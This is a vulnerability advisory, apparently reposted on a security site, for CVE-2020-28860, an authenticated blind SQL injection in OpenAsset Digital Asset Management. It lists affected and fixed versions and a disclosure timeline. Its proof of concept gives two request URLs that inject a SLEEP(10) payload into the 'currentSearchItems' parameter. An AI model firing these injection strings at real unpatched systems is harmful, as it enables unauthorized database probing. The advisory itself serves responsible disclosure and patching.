OpenAsset Digital Asset Management SQL Injection

2020.12.14
Credit: Jack Misiura
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Authenticated blind SQL injection (SQLi) Product: OpenAsset Digital Asset Management by OpenAsset Vendor Homepage: https://www.openasset.com/ Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise) Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise) CVE Number: CVE-2020-28860 Author: Jack Misiura from The Missing Link Website: https://www.themissinglink.com.au Timeline: 2020-11-14 Disclosed to Vendor 2020-12-04 Vendor releases final patches 2020-12-10 Publication 1. Vulnerability Description The OpenAsset Digital Asset Management application was vulnerable to a blind SQL injection, through the /AJAXPage/SearchResults endpoint, via the "currentSearchItems" parameter. 2. PoC The following requests will result in > 10 second delay in the response, due to the introduction of the SLEEP(10) command into the SQL query: https://example.com/AJAXPage/SearchResults?currentSearchItems=newUpload:0=11)%20AND%20(SELECT%20SLEEP(10))=1%23 https://example.com/AJAXPage/SearchResults?currentSearchItems=album%3A1=196)%20AND%20(SELECT+SLEEP(10)=1)%23 3. Solution The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it. 4. Advisory URL https://www.themissinglink.com.au/security-advisories


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top